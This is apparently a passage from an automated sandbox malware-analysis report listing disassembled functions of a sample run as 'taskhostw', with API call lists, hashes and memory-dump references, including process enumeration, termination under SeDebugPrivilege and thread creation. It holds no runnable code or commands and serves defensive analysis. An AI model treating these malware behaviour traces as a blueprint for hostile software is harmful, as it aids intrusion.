                                                                  • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                  • Instruction ID: 30119c59d4eea23ae6b1f614d39ee5e51332e4d175cf868a83380415df8d5498
                                                                  • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                  • Instruction Fuzzy Hash: F471A672A04B16ABE714AF79DC42BAEB3A8AF25724F14422BF514D73C1F770DA408790
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0021283A
                                                                  • GetMenuItemInfoW.USER32 ref: 0021289B
                                                                  • SetMenuItemInfoW.USER32 ref: 002128D1
                                                                  • Sleep.KERNEL32(000001F4), ref: 002128E3
                                                                  • GetMenuItemCount.USER32(?), ref: 00212927
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00212943
                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 0021296D
                                                                  • GetMenuItemID.USER32(?,?), ref: 002129B2
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002129F8
                                                                  • GetMenuItemInfoW.USER32 ref: 00212A0C
                                                                  • SetMenuItemInfoW.USER32 ref: 00212A2D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                  • String ID:
                                                                  • API String ID: 4176008265-0
                                                                  • Opcode ID: 7a1eacb25f211bffcedff46de69dd929a9a45ebc7de1a541fc5706ab0e5ae36e
                                                                  • Instruction ID: 7c97300454c03b4debe16d6f0d5c00851a20a62e30abe99ce2cc1917de68cea4
                                                                  • Opcode Fuzzy Hash: 7a1eacb25f211bffcedff46de69dd929a9a45ebc7de1a541fc5706ab0e5ae36e
                                                                  • Instruction Fuzzy Hash: 7661817092024AEFDB21CF64E9889EEBBF9EF15304F240059F841A7251D771ADB9DB60
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00236FD7
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00236FDA
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00236FFE
                                                                  • _memset.LIBCMT ref: 0023700F
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00237021
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00237099
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 830647256-0
                                                                  • Opcode ID: 3b4f534d78c7605ef7f447171db068342f3b9fb10d6b2d4fe217b21cc6aa6209
                                                                  • Instruction ID: ae6f227a6ce669511c185bc9aeb9c1019883e5d60ccbc12f048b0cbc6b49a8be
                                                                  • Opcode Fuzzy Hash: 3b4f534d78c7605ef7f447171db068342f3b9fb10d6b2d4fe217b21cc6aa6209
                                                                  • Instruction Fuzzy Hash: 03618EB1910218AFDB20DFA4DC85EEEB7F8EB09710F14415AFA15AB2A1C770AD51DF50
                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00206F15
                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00206F6E
                                                                  • VariantInit.OLEAUT32(?), ref: 00206F80
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00206FA0
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00206FF3
                                                                  • SafeArrayUnaccessData.OLEAUT32(?,00000002,?,?,?,?,?,?,?,00206CA6), ref: 00207007
                                                                  • VariantClear.OLEAUT32(?), ref: 0020701C
                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00207029
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00207032
                                                                  • VariantClear.OLEAUT32(?), ref: 00207044
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0020704F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  • Opcode ID: aaaff27b5db5258880d998a4ff7f47cfc571b779ee28611dcab5a664a39508c0
                                                                  • Instruction ID: 9cdb79450cc55690df9a6836247a9c1c40fb0e01e2ca9b7461ed4b2581cdc2b4
                                                                  • Opcode Fuzzy Hash: aaaff27b5db5258880d998a4ff7f47cfc571b779ee28611dcab5a664a39508c0
                                                                  • Instruction Fuzzy Hash: 91416235D10219AFCB00DF64E848DEEBBB9FF48314F008069EA55A7262CB31A955CF90
                                                                  APIs
                                                                    • Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
                                                                    • Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C
                                                                  • CoInitialize.OLE32 ref: 00228518
                                                                  • CoUninitialize.OLE32 ref: 00228523
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00242BEC,?), ref: 00228583
                                                                  • IIDFromString.OLE32(?,?), ref: 002285F6
                                                                  • VariantInit.OLEAUT32(?), ref: 00228690
                                                                  • VariantClear.OLEAUT32(?), ref: 002286F1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 834269672-1287834457
                                                                  • Opcode ID: 463c20d691177aeae49b4d20311cc875235d859198328607bb8a0a9c91a4a923
                                                                  • Instruction ID: 9851bda40d383cf5b53a81a13dff09f7ec12d7a305a12158d8e5b282f53a2e2c
                                                                  • Opcode Fuzzy Hash: 463c20d691177aeae49b4d20311cc875235d859198328607bb8a0a9c91a4a923
                                                                  • Instruction Fuzzy Hash: 6E61D670629311AFD710DF94E848F6EB7E8AF44714F40481DF58597291DB70ED68CB92
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumWindows
                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                  • API String ID: 3555792229-1603158881
                                                                  • Opcode ID: 77f37cb017dc6391b95a870a5c0426bd63e50e1ead836e4bfd59d05058143110
                                                                  • Instruction ID: d03d7d668415e7dc15b6789e67666d6c9759d37aaa3117f833e5e5445e1a7b27
                                                                  • Opcode Fuzzy Hash: 77f37cb017dc6391b95a870a5c0426bd63e50e1ead836e4bfd59d05058143110
                                                                  • Instruction Fuzzy Hash: 3E91C730A20706ABCF18DF60C891BEDFBB9BF14304F948119D459A72D2DF3169A9CB91
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 001B2EAE
                                                                    • Part of subcall function 001B1DB3: GetClientRect.USER32(?,?), ref: 001B1DDC
                                                                    • Part of subcall function 001B1DB3: GetWindowRect.USER32(?,?), ref: 001B1E1D
                                                                    • Part of subcall function 001B1DB3: ScreenToClient.USER32(?,?), ref: 001B1E45
                                                                  • GetDC.USER32 ref: 001ECEB2
                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001ECEC5
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 001ECED3
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 001ECEE8
                                                                  • ReleaseDC.USER32(?,00000000), ref: 001ECEF0
                                                                  • MoveWindow.USER32(?,?,?,?,?,?), ref: 001ECF7B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                  • String ID: U
                                                                  • API String ID: 4009187628-3372436214
                                                                  • Opcode ID: 9cbea396b9d2e419d58cc843b608642f03fda4cef8ab79b38c4fe3ebfff1af84
                                                                  • Instruction ID: 295cffabdfe54ced370552615ddab022df125ba76108762a6b193f1eac83c0f3
                                                                  • Opcode Fuzzy Hash: 9cbea396b9d2e419d58cc843b608642f03fda4cef8ab79b38c4fe3ebfff1af84
                                                                  • Instruction Fuzzy Hash: 4D719C31500645EFCF258F65DC84AEEBBB6FF49320F14426AFD555A2A6C7308892DFA0
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0023F910), ref: 00228E3D
                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0023F910), ref: 00228E71
                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00228FEB
                                                                  • SysFreeString.OLEAUT32(?), ref: 00229015
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                  • String ID:
                                                                  • API String ID: 560350794-0
                                                                  • Opcode ID: 8d5aaa9d6e744940a240718a09ff92459d2be7d2d094955d4cc976d299a04b3e
                                                                  • Instruction ID: 84f37a1009899767bf2e19f371496c7023096c39d4d92896dff2ed411a518915
                                                                  • Opcode Fuzzy Hash: 8d5aaa9d6e744940a240718a09ff92459d2be7d2d094955d4cc976d299a04b3e
                                                                  • Instruction Fuzzy Hash: 08F14971A1021AFFCB04DF94D988EAEB7B9BF49315F108058F919AB250CB71EE55CB50
                                                                  APIs
                                                                    • Part of subcall function 002146AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002136DB,?), ref: 002146CC
                                                                    • Part of subcall function 002146AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002136DB,?), ref: 002146E5
                                                                    • Part of subcall function 00214AD8: GetFileAttributesW.KERNEL32(?,0021374F), ref: 00214AD9
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00214DE7
                                                                  • _wcscmp.LIBCMT ref: 00214E01
                                                                  • MoveFileW.KERNEL32 ref: 00214E1C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 793581249-0
                                                                  • Opcode ID: 28fd21badfb5444ab5f6f9b5db21d1651c0618d8f8706bcdc4148b91badcd41e
                                                                  • Instruction ID: 540f61577a31dd633a9ef6fe06308e2281eff0444f9a445e15f5eed829e1eb1e
                                                                  • Opcode Fuzzy Hash: 28fd21badfb5444ab5f6f9b5db21d1651c0618d8f8706bcdc4148b91badcd41e
                                                                  • Instruction Fuzzy Hash: 845164B24183859BC724EFA0D881DDFB7ECAFA5300F10092EF599D3151EF74A6988766
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00238731
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: 97301ae0ebdec8afdfc63a575cf4794ec81f5c097157d6d7e7824c9b42d07e2d
                                                                  • Instruction ID: dc57a2ded1103b8cdc73c3712ee460374f667f0304301990eb6cb97b29bd8165
                                                                  • Opcode Fuzzy Hash: 97301ae0ebdec8afdfc63a575cf4794ec81f5c097157d6d7e7824c9b42d07e2d
                                                                  • Instruction Fuzzy Hash: 7351B3B0520319BFEB249F29DC8AB997B69EB05350F604515FA15EE1E0CFB1E9A0CF50
                                                                  APIs
                                                                  • LoadImageW.USER32 ref: 001EC477
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001EC499
                                                                  • LoadImageW.USER32 ref: 001EC4B1
                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 001EC4CF
                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001EC4F0
                                                                  • DestroyIcon.USER32(00000000), ref: 001EC4FF
                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001EC51C
                                                                  • DestroyIcon.USER32(?), ref: 001EC52B
                                                                    • Part of subcall function 0023A4E1: DeleteObject.GDI32(00000000), ref: 0023A51A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                  • String ID:
                                                                  • API String ID: 2819616528-0
                                                                  • Opcode ID: 208d55e4c26ecdc5dc543d48cfc1255428335c5b3442108dc9ad325619d7b34d
                                                                  • Instruction ID: 72252ff4f1d7fd92fa6b1ec12218ab63f4a1664973e68b25786b014685d6a483
                                                                  • Opcode Fuzzy Hash: 208d55e4c26ecdc5dc543d48cfc1255428335c5b3442108dc9ad325619d7b34d
                                                                  • Instruction Fuzzy Hash: 9D517A70A00609EFDB24DF29ED45FAA7BB5EB58710F100528F90697290DBB0ED91DB90
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00208864,00000B00,?,?), ref: 00208BEC
                                                                  • HeapAlloc.KERNEL32(00000000,?,00208864,00000B00,?,?), ref: 00208BF3
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00208864,00000B00,?,?), ref: 00208C08
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00208864,00000B00,?,?), ref: 00208C10
                                                                  • DuplicateHandle.KERNEL32 ref: 00208C13
                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00208864,00000B00,?,?), ref: 00208C23
                                                                  • GetCurrentProcess.KERNEL32(00208864,00000000,?,00208864,00000B00,?,?), ref: 00208C2B
                                                                  • DuplicateHandle.KERNEL32 ref: 00208C2E
                                                                  • CreateThread.KERNEL32(00000000,00000000,00208C54,00000000,00000000,00000000), ref: 00208C48
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  • Opcode ID: ceb5c04107e06e530910397d22d1b6b469e4f94b5eecf3d007a9e5b378630bd4
                                                                  • Instruction ID: 1be9a647ea6217112f5b651d7821b1b15d04744e08398e2b57c13d816c9d8ccb
                                                                  • Opcode Fuzzy Hash: ceb5c04107e06e530910397d22d1b6b469e4f94b5eecf3d007a9e5b378630bd4
                                                                  • Instruction Fuzzy Hash: C301BBB5640348FFE750ABA5FD4DF6B3BACEB89711F004421FA49DB1A1CA709804DB20
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00236E56
                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00236E6A
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00236E84
                                                                  • _wcscat.LIBCMT ref: 00236EDF
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00236EF6
                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00236F24
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcscat
                                                                  • String ID: SysListView32
                                                                  • API String ID: 307300125-78025650
                                                                  • Opcode ID: 5588d62d314933413dacb88da277eaf293c58674d4ef3b6af936fe8da235b758
                                                                  • Instruction ID: 4a70459b914275e21de44ec8668679d4438fcd757819fdb2186cba37050aba0d
                                                                  • Opcode Fuzzy Hash: 5588d62d314933413dacb88da277eaf293c58674d4ef3b6af936fe8da235b758
                                                                  • Instruction Fuzzy Hash: 9F41C0B0A10309BBEB219F64DC89FEEB7ACEF08350F10442AF555A7291D7729D948B60
                                                                  APIs
                                                                    • Part of subcall function 00213C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00213CBE
                                                                    • Part of subcall function 00213C99: Process32FirstW.KERNEL32(00000000,?), ref: 00213CCC
                                                                    • Part of subcall function 00213C99: CloseHandle.KERNEL32(00000000), ref: 00213D96
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0022EAB8
                                                                  • GetLastError.KERNEL32 ref: 0022EACB
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0022EAFA
                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0022EB77
                                                                  • GetLastError.KERNEL32(00000000), ref: 0022EB82
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0022EBB7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 2533919879-2896544425
                                                                  • Opcode ID: b68f7b94d6f4137d444b85a2c439a0e82734e298fdb3fe21cd526601fce39938
                                                                  • Instruction ID: 9447467deaa7890fcb3e3dce486675a3a4032b621d5d4bc9be6eceafcfca1807
                                                                  • Opcode Fuzzy Hash: b68f7b94d6f4137d444b85a2c439a0e82734e298fdb3fe21cd526601fce39938
                                                                  • Instruction Fuzzy Hash: A641E130610211AFDB14EF64EC96FADB7A1BF50714F05805CF9469B2D2CBB4A824DF81
                                                                  APIs
                                                                    • Part of subcall function 02AB8408: __time64.LIBCMT ref: 02AB8412
                                                                    • Part of subcall function 02A54445: _fseek.LIBCMT ref: 02A5445D
                                                                  • __wsplitpath.LIBCMT ref: 02AB86DD
                                                                    • Part of subcall function 02A7366E: __wsplitpath_helper.LIBCMT ref: 02A736AE
                                                                  • _wcscpy.LIBCMT ref: 02AB86F0
                                                                  • _wcscat.LIBCMT ref: 02AB8703
                                                                  • __wsplitpath.LIBCMT ref: 02AB8728
                                                                  • _wcscat.LIBCMT ref: 02AB873E
                                                                  • _wcscat.LIBCMT ref: 02AB8751
                                                                    • Part of subcall function 02AB844E: _memmove.LIBCMT ref: 02AB8487
                                                                    • Part of subcall function 02AB844E: _memmove.LIBCMT ref: 02AB8496
                                                                  • _wcscmp.LIBCMT ref: 02AB8698
                                                                    • Part of subcall function 02AB8BDD: _wcscmp.LIBCMT ref: 02AB8CCD
                                                                    • Part of subcall function 02AB8BDD: _wcscmp.LIBCMT ref: 02AB8CE0
                                                                  • _wcsncpy.LIBCMT ref: 02AB896E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat_wcscmp$__wsplitpath_memmove$__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                  • String ID:
                                                                  • API String ID: 2744720387-0
                                                                  • Opcode ID: 3f3dfb22d26f6a159bee78abb3726d03450e3d1cb18015426b1c2ca3c1fd6652
                                                                  • Instruction ID: fcd451251dc3a4b7de28f701058957bf5d35fe55ae864683c511dd13635f8f08
                                                                  • Opcode Fuzzy Hash: 3f3dfb22d26f6a159bee78abb3726d03450e3d1cb18015426b1c2ca3c1fd6652
                                                                  • Instruction Fuzzy Hash: 6CC109B1D40229AFDF11DFA5CD84ADEBBBDAF48310F0040AAE609E7151DB749A84CF65
                                                                  APIs
